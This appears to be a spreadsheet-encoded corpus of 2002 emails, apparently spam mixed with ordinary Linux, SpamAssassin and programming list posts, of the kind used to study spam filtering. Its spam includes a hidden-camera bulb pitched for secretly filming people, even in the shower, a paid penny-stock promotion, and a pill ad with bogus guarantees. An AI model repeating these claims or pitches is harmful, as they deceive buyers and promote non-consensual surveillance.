    <t xml:space="preserve">Subject: Watch your TEENS or the BabySitter....&amp; GET RICH!
</t>
  </si>
  <si>
    <t xml:space="preserve">Look this is so hot that not only do you want one... but you can get rich selling it to others... some will use it for good and many will use it for bad... either way the unit works...It is a bulb... but it is not a bulb... it is a secret wireless camera use professionally by cia, fbi and others... original cost was over $5000 but because someone went to china to knock them off you now can buy it today for $299 each, or 2 for $499 or 10 for $1750... do the math... you can earn $125 per unit or more and sell 10 in a week... all people need to do is see one and they flip out...Here is how it worksYou screw it into any lamp, wall  or ceiling bulb socet (even over the shower) it could be in a dark place it don't matter... put it in your bedroom and make sure your wife does not have company while you are working... i am telling you man you would pay $1000's for this toy... Then you take the other piece and plug it into your vcr and it is as if you were standing over the person wi!
 th!
  a video camera... As I said some will use it for good and some will use it for bad... and some will be like me and just get rich selling them... all you need do is demo it and they buy it... heh he even if it takes a day to sell just one you make $125but who says you have to charge $299 you can charge $499 and make $325 follow the rest of the information and check it out....Special Sale thru July 31st, 2002               http://www.easy-signup.com/sv4/ 
 Why am I receiving this email?  Because you or someone using this email address has opted to receive New Product information from Internet-Hitz or one of its entrusted partners..Thank you for your patronage.
 If this is an error please send an email to be removed.
 in the subject line type: Remove Me List-1046-78x
 mail to meoffnow2Kb@yahoo.com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</si>
  <si>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Sorry they were in a meeting
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;/HEAD&gt;&lt;BODY leftmargin=3D=220=22 topmargin=3D=220=
 =22 marginwidth=3D=220=22 marginheight=3D=220=22 bgcolor=3D=22=23FFFFFF=22&gt;&lt;CENTER&gt;=
 &lt;TABLE width=3D=22700=22 border=3D=221=22 cellspacing=3D=220=22 cellpadding=3D=2215=
 =22 bordercolor=3D=22=23FF0000=22&gt;&lt;TR&gt;&lt;TD height=3D=22135=22 valign=3D=22top=22&gt;&lt;DI=
 V align=3D=22center=22&gt;&lt;TABLE width=3D=22500=22 border=3D=220=22 cellspacing=3D=220=
 =22 cellpadding=3D=220=22 align=3D=22center=22&gt;&lt;TR valign=3D=22top=22&gt;&lt;TD colspan=3D=
 =223=22 height=3D=2243=22&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT face=3D=22Arial=22 size=3D=
 =227=22 color=3D=22=23ff0000=22&gt;&lt;B&gt;URGENT NOTICE&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/T=
 ABLE&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT size=3D=224=22 face=3D=22Arial, Helvetica, =
 sans-serif=22 color=3D=22=230000ff=22&gt;&lt;B&gt;&lt;I&gt;PENDING MERGER TO INCREASE REVENU=
 E 236%&lt;/I&gt;&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT size=3D=224=22 face=3D=22Verdana=22 color=3D=22=23=
 ff0000=22&gt;&lt;BR&gt;&lt;B&gt;NOW IS THE TIME TO INVEST IN GWIH&lt;BR&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/DI=
 V&gt;&lt;UL&gt;&lt;LI&gt;&lt;DIV align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-s=
 erif=22 size=3D=222=22&gt;GWIH is rapidly expanding through acquisitions. In th=
 e 1st Quarter TWO mergers are in proces with a schedule to buy FOUR more=
  profitable companies by the year end.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV =
 align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=22=
 2=22&gt;GWIH plans to file for NASDAQ. Stock prices historically increase wh=
 en listed on NASDAQ.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV align=3D=22left=22&gt;&lt;B=
 &gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;
 On May 30th, a year long Investor Relation and Public Awareness campaig=
 n will be launched to build shareholder equity. SEVERAL well-known stock=
  pick newsletters, TV, radio and newsgroups will provide coverage on GWI=
 H and it's acquisitions.&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;LI&gt;&lt;DIV align=3D=22left=22=
 &gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;All-Star Ma=
 nagement Team with Advanced Degrees, Specialized Training, Proven Track =
 Records and over 90 years Combined Experience. They are true Deal Makers=
 , Executors and Closers.&lt;BR&gt;&lt;BR&gt;&lt;FONT face=3D=22Times New Roman, Times, se=
 rif=22 size=3D=223=22 color=3D=22ff0000=22&gt;&lt;I&gt;Put GWIH on your watch list,&amp;nbsp=
 ;&lt;FONT color=3D=220000ff=22&gt;AQUIRE A POSTION IN GWIH TODAY =21&lt;/FONT&gt;&lt;/I&gt;&lt;/F=
 ONT&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/UL&gt;&lt;DIV align=3D=22left=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, H=
 elvetica, sans-serif=22 size=3D=222=22&gt;GWIH RECENT MERGERS and NEW BUSINESS =
 DEVELOPMENTS:&lt;/FONT&gt;&lt;/B&gt;&lt;UL&gt;&lt;LI&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-=
 serif=22 size=3D=222=22&gt;Acquired Bechler Cams, founded in 1957, specializes =
 in precision high tolerance parts for aerospace, defense, medical, and s=
 urgical manufacturing sectors.&lt;A href=3D=22http://news.moneycentral.msn.co=
 m/ticker/article.asp?Symbol=3DUS:GWIH&amp;amp;Feed=3DBW&amp;amp;Date=3D20020404&amp;amp=
 ;ID=3D1534956=22&gt;&lt;BR&gt;CLICK FOR FULL STORY&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;LI&gt;&lt;B&gt;&lt;FONT face=3D=
 =22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;Acquired Nelson Engineering=
 , BOEING CERTIFIED supplier of aerospace and defense parts was recently =
 awarded contracts with Lockheed Martin and Boeing that will result in MA=
 JOR production increases.&lt;A href=3D=22http://news.moneycentral.msn.com/tic=
 ker/article.asp?Symbol=3DUS:GWIH&amp;amp;Feed=3DBW&amp;amp;Date=3D20020426&amp;amp;ID=3D=
 1594440=22&gt;&lt;BR&gt;CLICK FOR FULL STORY&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;/B&gt;&lt;/UL&gt;&lt;/DIV&gt;&lt;UL&gt;&lt;=
 BR&gt;&lt;BR&gt;&lt;A href=3D=22http://moneycentral.msn.com/scripts/webquote.dll?ipage=
 =3Dqd&amp;amp;Symbol=3Dgwih=22&gt;&lt;FONT size=3D=224=22 face=3D=22Arial, Helvetica, sans=
 -serif=22&gt;&lt;B&gt;CLICK FOR QUOTE&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT size=3D=223=22&gt;&lt;BR&gt;=
 &lt;/FONT&gt;&lt;DIV align=3D=22center=22&gt;&lt;FONT size=3D=223=22&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, =
 Helvetica, sans-serif=22 color=3D=22ff0000=22&gt;
 To unsubscribe simply reply to this email for permanent removal.&lt;/FONT&gt;=
 &lt;/B&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=3D=22Arial, Helvetica, sans-serif=22 size=3D=222=22&gt;&lt;=
 BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;=
 BR&gt;&lt;BR&gt;&lt;BR&gt;
 Information within this advertisement contains =22forward looking=22 stat=
 ements within the meaning of Section 27(a) of the U.S. Securities Act of=
  1933 and Section 21(e) of the U.S. Securities Exchange Act of 1934. Any=
  statements that express or involve discussions with respect to predicti=
 ons, expectations, beliefs, plans, projections, objectives, goals, assum=
 ptions or future events or performance are not statements of historical =
 facts and may be forward looking statements. Forward looking statements =
 are based on expectations, estimates and projections at the time the sta=
 tements are made that involve a number of risks and uncertainties which =
 could cause actual results or events to differ materially from those pre=
 sently anticipated. Forward looking statements may be identified through=
  the use of words such as expects, will, anticipates, estimates, believe=
 s, or by statements indicating certain actions may, could or might occur=
 . Special Situation Alerts (SSA) is an independent publication and has b=
 een paid 125,000 free trading shares of GWIH for this publication. SSA a=
 nd/or its Affiliates or agents may at any time after receipt of compensa=
 tion in Stock sell all or part of the stock received into the open marke=
 t at the time of receipt or immediately after it has profiled a particul=
 ar company. SSA is not a registered investment advisor or a broker deale=
 r. Be advised that the investments in companies profiled are considered =
 to be high risk and use of the information provided is at the investor's=
  sole risk and may result in the loss of some or all of the investment. =
 All information is provided by the companies profiled and SSA makes no r=
 epresentations, warranties or guarantees as to the accuracy or completen=
 ess of the disclosure by the profiled companies. Investors should NOT re=
 ly on the information presented. Rather, investors should use this infor=
 mation as a starting point for doing additional independent research to =
 allow the investor to form his or her own opinion regarding investing in=
  profiled companies. Factual statements as of the date stated and are su=
 bject to change without notice.&lt;/FONT&gt;&lt;/B&gt;&lt;/DIV&gt;&lt;/UL&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/T=
 ABLE&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 *******
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Family Targetted Advertising
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Forwarded-by: Rob Windsor &lt;windsor@warthog.com&gt;
 Forwarded-by: "Dave Bruce" &lt;dbruce@wwd.net&gt;
 Forwarded by: Gary Williams &lt;garyaw1990@aol.com&gt;
 A Mother had 3 virgin daughters. They were all getting married within a 
 short time period. Because Mom was a bit worried about how their sex 
 life would get started, she made them all promise to send a postcard 
 from the honeymoon with a few words on how marital sex felt. 
 The first girl sent a card from Hawaii two days after the wedding.  The 
 card said nothing but "Maxwell House".  Mom was puzzled at first, but 
 then went to the kitchen and got out the Nescafe jar. It said: "Good till 
 the last drop." Mom blushed, but was pleased for her daughter. 
 The second girl sent the card from Vermont a week after the wedding, 
 and the card read: "Benson &amp; Hedges".  Mom now knew to go straight to 
 her husband's cigarettes, and she read from the Benson &amp; Hedges pack: 
 "Extra Long, King Size".  She was again slightly embarrassed but still 
 happy for her daughter. 
 The third girl left for her honeymoon in the Caribbean.  Mom waited for 
 a week, nothing. Another week went by and still nothing.  Then after a 
 whole month, a card finally arrived.  Written on it with shaky 
 handwriting were the words: "British Airways".  Mom took out her latest 
 Harper's Bazaar magazine, flipped through the pages fearing the worst, 
 and finally found the ad for the airline.  The ad said: "Three times a 
 day, seven days a week, both ways." 
 Mom fainted. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Installing RPM
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 30 Jul 2002 22:22:24 +0200, "Manfred Grobosch" &lt;mangro@home.se&gt; wrote:
 &gt; I would like to install RPM itself. I have tried to get the information by
 &gt; visiting www.rpm.org &lt;http://www.rpm.org&gt;  and the related links they give
 &gt; but they all seems to assume that RPM already is installed.
 &gt; I have a firewall based on linux-2.2.20 (Smoothwall) for private use.
 &gt; I would like to install the RPM package/program but there is no information
 &gt; how to do this from scratch.
 &gt; Found this site and hopefully some have the knowledge.
     Well, if you have a Windows, SCO, or AIX box, (generally anything BUT Redhat Linux) that'd be the site I'd send you to, to get it installed.  I've been there for the same reason, under SCO.  Maybe you missed something?
     What OS are you running, anyway?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</si>
  <si>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Subject: Stark raving sane
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/24.html#stark_raving_sane
 Date: 2002-09-24T22:05:32-05:00
 _Sam Ruby_: Stark raving mad[1]. 
     This post was entered in Radio, extracted using a batch file via some 
     UserTalk, parsed using Perl, cleaned up by tidy and a C program of my own 
     design, transferred to intertwingly using scp, and then ssh triggers 
     unpacking on the destination site, where a shell script takes over: invokes 
     indexing using Jakarta's Lucene, and then a python script pings weblogs.com 
     and blo.gs. 
 Tom Stoppard (_Rosencrantz and Guildenstern are Dead_): 
     Guildenstern: &amp;#8220;A man talking sense to himself is no madder than a man 
     talking nonsense not to himself.&amp;#8221;
     Rosencrantz: &amp;#8220;Or just as mad.&amp;#8221;
     Guildenstern: &amp;#8220;Or just as mad.&amp;#8221;
     Rosencrantz: &amp;#8220;And he does both.&amp;#8221;
     Guildenstern: &amp;#8220;So there you are.&amp;#8221;
     Rosencrantz: &amp;#8220;Stark raving sane.&amp;#8221; 
 [1] http://www.intertwingly.net/blog/844.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: High-end custom websites, $399 complete!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;
 &lt;BODY&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;FONT color=3D#ff0000&gt;&lt;STRONG&gt;Beaut=
 iful, 
 &lt;I&gt;high-end&lt;/I&gt;, &lt;I&gt;custom&lt;/I&gt; websites (or yours redesigned)&lt;I&gt; for $399 
 complete!&lt;/I&gt; &lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;TABLE cellSpacing=3D0 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"14%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/applied.jpg" width=3D100 
       border=3D0&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"14%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/compu.jpg" width=3D100 
       border=3D0&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"14%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/automated.jpg" width=3D100 
       border=3D0&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"14%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/sterling.jpg" width=3D100 
       border=3D0&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"14%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/insul.jpg" width=3D100 
       border=3D0&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"15%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.0catch.com/csi.jpg" width=3D100 
     border=3D0&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter align=3Dleft width=3D"15%"&gt;&lt;FONT size=3D2&gt;&lt;IMG hei=
 ght=3D75 
       src=3D"http://www.webdeal.20m.com/intimate.jpg" width=3D100 
       border=3D0&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;DIV align=3Dleft&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT face=3DAria=
 l&gt;&lt;FONT 
 color=3D#000000 size=3D2&gt;All sites are started from scratch.&amp;nbsp; We buil=
 d them in 
 whatever fashion&amp;nbsp;the client&amp;nbsp;likes and we employ only top 
 designers.&amp;nbsp;&lt;/FONT&gt;&lt;FONT size=3D2&gt;&lt;FONT color=3D#000000&gt;Includes up to=
  6 pages 
 (you can add more), feedback forms, more. To get this price you must host =
 with 
 us&amp;nbsp;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;FONT color=3D#000000&gt;&lt;FONT size=3D2&gt;&lt;FONT 
 color=3D#ff0000&gt;&lt;FONT face=3DArial&gt;&lt;FONT color=3D#000000&gt;&lt;FONT size=3D2&gt;wi=
 th us for only 
 @19.95/month (100 megs, 20 Email POP accounts and more). We have reference=
 s 
 coast to coast and a rep for your area. &lt;FONT color=3D#ff0000&gt;&lt;STRONG&gt;Comp=
 lete 
 below or call&lt;/STRONG&gt;&lt;FONT size=3D2&gt;&lt;FONT face=3DArial&gt;&lt;STRONG&gt; 800-977-5=
 115 (24 
 hours) for details and site addresses&lt;/STRONG&gt; &lt;STRONG&gt;to 
 view.&lt;/STRONG&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;/FONT&gt;=
 &lt;/DIV&gt;
 &lt;FORM action=3D"mailto:van17@post.com?subject=3DSales Inquiry 84 399" meth=
 od=3Dpost 
 encType=3Dtext/plain &lt;FORM&gt;
 &lt;TABLE height=3D59 width=3D"101%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=3Dcenter width=3D"7%" height=3D24&gt;&lt;FONT size=3D2&gt;&lt;FONT face=
 =3DArial 
       size=3D1&gt;Name:&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter width=3D"19%" height=3D24&gt;&lt;FONT face=3DArial size=3D1&gt;&lt;INPUT 
       style=3D"WIDTH: 127px; HEIGHT: 17px" size=3D17 name=3DName&gt;&lt;/FONT&gt;&lt;/=
 TD&gt;
     &lt;TD vAlign=3Dcenter width=3D"26%" height=3D24&gt;&lt;FONT face=3DArial 
       size=3D1&gt;Company:&lt;FONT color=3D#000000&gt;&lt;INPUT 
       style=3D"WIDTH: 120px; HEIGHT: 19px" size=3D16 name=3DCompany&gt;&lt;/FONT=
 &gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter width=3D"19%" height=3D24&gt;&lt;FONT face=3DArial color=
 =3D#000000 
       size=3D1&gt;&lt;INPUT type=3Dradio value=3DNew name=3DType&gt;New Site&lt;INPUT =
 type=3Dradio 
       value=3DRedesign name=3DType&gt;Redesign &lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD vAlign=3Dcenter width=3D"32%" colSpan=3D2 height=3D24&gt;&lt;FONT face=3DArial 
       size=3D1&gt;Current Site: &lt;FONT color=3D#000000&gt;&lt;INPUT 
       style=3D"FONT-SIZE: 8pt; WIDTH: 132px; HEIGHT: 18px" size=3D14 value=
 =3Dwww. 
       name=3DCurtrentsite&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"7%" height=3D27&gt;&lt;FONT face=3DArial size=3D1&gt;Phone1 :&lt;/FON=
 T&gt;&lt;/TD&gt;
     &lt;TD width=3D"19%" height=3D27&gt;&lt;FONT face=3DArial size=3D1&gt;&lt;INPUT 
       style=3D"FONT-SIZE: 8pt; WIDTH: 127px; HEIGHT: 17px" size=3D17 
       name=3DPhone1&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD width=3D"8%" height=3D27&gt;&lt;FONT face=3DArial size=3D1&gt;Phone2:&lt;/FONT=
 &gt;&lt;FONT 
       face=3DArial size=3D1&gt;&lt;INPUT 
       style=3D"FONT-SIZE: 8pt; WIDTH: 127px; HEIGHT: 17px" size=3D17 
       name=3DPhone2&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD width=3D"20%" height=3D27&gt;&lt;FONT face=3DArial size=3D1&gt;Email:&lt;INPUT=
       style=3D"FONT-SIZE: 8pt; WIDTH: 93px; HEIGHT: 17px" size=3D17 
       name=3Demail&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD width=3D"22%" height=3D27&gt;&lt;FONT face=3DArial size=3D1&gt;State:&lt;FONT 
       color=3D#000000&gt;&lt;INPUT style=3D"WIDTH: 68px; HEIGHT: 19px" size=3D16=
       name=3DState&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;
     &lt;TD width=3D"10%" height=3D27&gt;&lt;FONT face=3DArial color=3D#000000 
       size=3D1&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"7%" height=3D27&gt;&lt;/TD&gt;
     &lt;TD width=3D"19%" height=3D27&gt;&lt;/TD&gt;
     &lt;TD width=3D"28%" colSpan=3D2 height=3D27&gt;
       &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#000000 size=3D1&gt;&lt;INPUT=
  type=3Dsubmit value=3DSubmit name=3DB1&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"22%" height=3D27&gt;&lt;/TD&gt;
     &lt;TD width=3D"10%" height=3D27&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/FORM&gt;&lt;FONT s=
 ize=3D2&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT face=3DArial size=3D1&gt;To Be Removed From Our Lis=
 t, 
 &lt;STRONG&gt;CLICK HERE: &lt;/STRONG&gt;&lt;A 
 href=3D"mailto:xxz7rem@mail.com?subject=3DRemove__84n"&gt;&lt;FONT color=3D#0000=
 00&gt;Remove 
 My_Address &lt;/FONT&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Tru64 compile of SA
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a new user (or about to be, hopefully) of SA but I've run into some
 compilation errors that prevent me from installing.  Rather than picking
 through the code, I thought I'd avoid reinventing the wheel and ask here.
 When I run the 'make', I get the following:
 cc: Error: spamd/spamc.c, line 50: In this declaration, "in_addr_t" has no
 linka
 ge and has a prior declaration in this scope at line number 572 in file
 /usr/inc
 lude/sys/types.h. (nolinkage)
 typedef unsigned long   in_addr_t;      /* base type for internet address
 */
 ------------------------^
 cc: Warning: spamd/spamc.c, line 169: In this statement, the referenced
 type of
 the pointer value "msg_buf" is "char", which is not compatible with
 "unsigned ch
 ar". (ptrmismatch)
   if((bytes = full_read (in, msg_buf, max_size+1024, max_size+1024)) &gt;
 max_size)
 -----------------------------^
 cc: Warning: spamd/spamc.c, line 174: In this statement, the referenced
 type of
 the pointer value "header_buf" is "char", which is not compatible with
 "const un
 signed char". (ptrmismatch)
     full_write (out,header_buf,bytes2);
 --------------------^
 There are lots more where they came from.  Any ideas what can be done?
 Thanks in advance.
 ================================================================================
 Don Newcomer                                            Dickinson College
 Associate Director, System and Network Services		P.O. Box 1773
 newcomer@dickinson.edu                                  Carlisle, PA  17013
                                                         Phone: (717) 245-1256
                                                           FAX: (717) 245-1690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</si>
  <si>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Freak breaks world record by clipping 153 clothespins on his face
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8421991,1717/
 Date: 2002-10-01T07:33:15+01:00
 (orange-today.co)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Muscles,Money,and Looks help-But Women want a Bigger Man                   IRBXIJ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;b&gt;&lt;FONT SIZE=3D4&gt;In a recent survey conducted by =
 &lt;FONT COLOR=3D#0033FF&gt;&lt;B&gt;Durex&lt;/B&gt;
 &lt;/FONT&gt;condoms, &lt;FONT COLOR=3D#FF0033&gt;6=
 7%
 &lt;/FONT&gt;of women said that&lt;br&gt;they are unhappy with the size of their lo=
 vers. Proof that &lt;FONT COLOR=3D#FF0033&gt;size does&lt;br&gt;matter&lt;/FONT&gt;! A large=
  member has much more surface area and is capable of&lt;br&gt;stimulating more n=
 erve endings, providing more pleasure for you and your&lt;br&gt;partner. Our rev=
 olutionary pill developed by world famous pharmacist is&lt;br&gt;guaranteed to i=
 ncrease your size by 1-3".&lt;BR&gt;&lt;A HREF=3D"http://www.mailcomesandgoes.com/v=
 irility/affiliate/affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DCli=
 ck"&gt;Enter here for details&lt;/A&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;b&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;B=
 R&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D1 COLOR=3D#FFFF=
 CC&gt;To come off just &lt;A "http://www.mailcomesandgoes.com/virility/affiliate=
 /affiliatewiz.asp?BannerID=3D1&amp;AffiliateID=3D4&amp;Task=3DClick"&gt;Open here&lt;/A&gt;=
 &lt;/FONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lowest Rates Available.                    edhhnjtvwx
</t>
  </si>
  <si>
    <t xml:space="preserve">When America's top companies compete for your business, you win.
 http://four87.six86.com/sure_quote/sure_quote.htm
 Take a moment to let us show you that we are here to save you money and address your concerns
 with absolutely no hassle, no obligation, no cost quotes, on all your needs, from America's
 top companies.
 -Life Insurance 70% off.
 -Medical Insurance 60% off.
 -Mortgage rates that save you thousands.
 -New home loans.
 -Refinance or consolidate high interest credit card debt into a low interest mortgage.
 -Get the best prices from the nation's leading health insurance companies.
 _Dental Insurance at the lowest rate available.
 We will soon be offering  Auto Insurance quotes as well.
 http://four87.six86.com/sure_quote/sure_quote.htm
 "...was able to get 3 great offers in
 less than 24 hours." -Jennifer C
 "Met all my needs... being able to search
 for loans in a way that puts me in control." -Robert T.
 "..it was easy, effortless...!"-Susan A.
 Click here to delete your address from future updates.
 http://four87.six86.com/sure_quote/rm/
</t>
  </si>
  <si>
    <t xml:space="preserve">Nick Hilliard's [nick-lists@netability.ie] 52 lines of wisdom included:
 &gt; The standard release versions of ipfilter are unencumbered, as always.
 &gt; 
 &gt; &gt; Nope, indeed IPFW2 has just been rolled out into -STABLE. (-STABLE
 &gt; &gt; is a stable branch of the code that has been rolled into -CURRENT
 &gt; &gt; first. It's basically a major release, that's still a work in
 &gt; &gt; progress)
 &gt; 
 &gt; I'm not so sure that ipfw2 is really ready for production yet, having
 &gt; only been mfc'd last wednesday.  It certainly adds some nice syntactic
 &gt; sugar, and is apparently much faster for certain types of complex
 &gt; rulesets.  It will be good once it's had some time to settle down a
 &gt; little.
 I would question anything being ready for "production" being in
 STABLE.
 He's kept backwards compatibility with ipfw, which is major plus.
 My point about IPFW2 being rolled out into stable was merely an
 illustration of the fact that ipfw is indeed not ipfilter, and that
 there are no license issues there :)
 -- 
   Philip Reynolds        
    RFC Networks          tel: 01 8832063
 www.rfc-networks.ie      fax: 01 8832041
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Support for Iraq action at new low of 32%
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655709,215/
 Date: 2002-10-08T03:30:57+01:00
 *UK latest: *Support for military action against Iraq among British voters has 
 fallen to 32%, the lowest level recorded while the Guardian/ICM survey has been 
 running.
</t>
  </si>
  <si>
    <t xml:space="preserve">Reza B'Far wrote:
 &gt;This thread kind of surprises me... I started coding with C, then C++, and
 &gt;moved on to Java... And, I think that:
 Looks like a case of "MY experience is comprehensive, YOUR'S is
 anecdotal, THEY don't know what they're talking about".
 &gt;1.  The people who pay the wages don't give a flyin' heck what programming
 &gt;language you write things in... they just want it to work.
 In my experience, they do care.  It has to work certainly, and in
 particular it has to work with what they've already got, and it has to
 work on client's systems.
 My limited experience of Java started a few years ago when support on
 Linux was so terrible that I ran away screaming and haven't come back yet.
 Microsoft has announced that they plan to remove Java from Windows.
 They took it out of XP already and it has to be installed with a
 service pack.  Somehow, I can't imagine them removing the ability to
 run C programs.
 &gt;2.  C and C++ forces the developer to solve problems such as memory
 &gt;management over and over again.
 Can't say I spend any noticeable amount of time on memory management
 issues, apart from the fact that I frequently need &gt; 4 GB.
 &gt;It's about design patterns, architecture, high level stuff...
 If your problem just requires application of a "design pattern" to solve,
